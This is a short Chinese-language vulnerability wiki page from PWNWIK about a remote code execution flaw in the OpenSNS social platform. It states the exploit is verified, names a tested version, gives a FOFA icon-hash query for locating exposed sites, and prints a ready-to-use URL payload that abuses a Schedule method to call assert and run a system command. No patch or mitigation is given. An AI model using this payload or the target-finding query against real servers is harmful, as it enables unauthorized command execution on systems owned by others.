◆◆0

OpenSNS 远程代码执行漏洞/zh-cn

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

该漏洞已通过验证。

本页面的EXP/POC/Payload经测试可用，漏洞已经成功复现。

漏洞影响

OpenSNS

经过测试，在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。

FOFA

icon_hash="1167011145"

POC

http://<target>/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26idstatus=1%26idmethod=Schedule-%3E_validationFieldItem%26id4=function%266=%26id0=cmd%26id1=assert%26idargs=cmd=system(ipconfig)

pwnwiki.com

返回顶部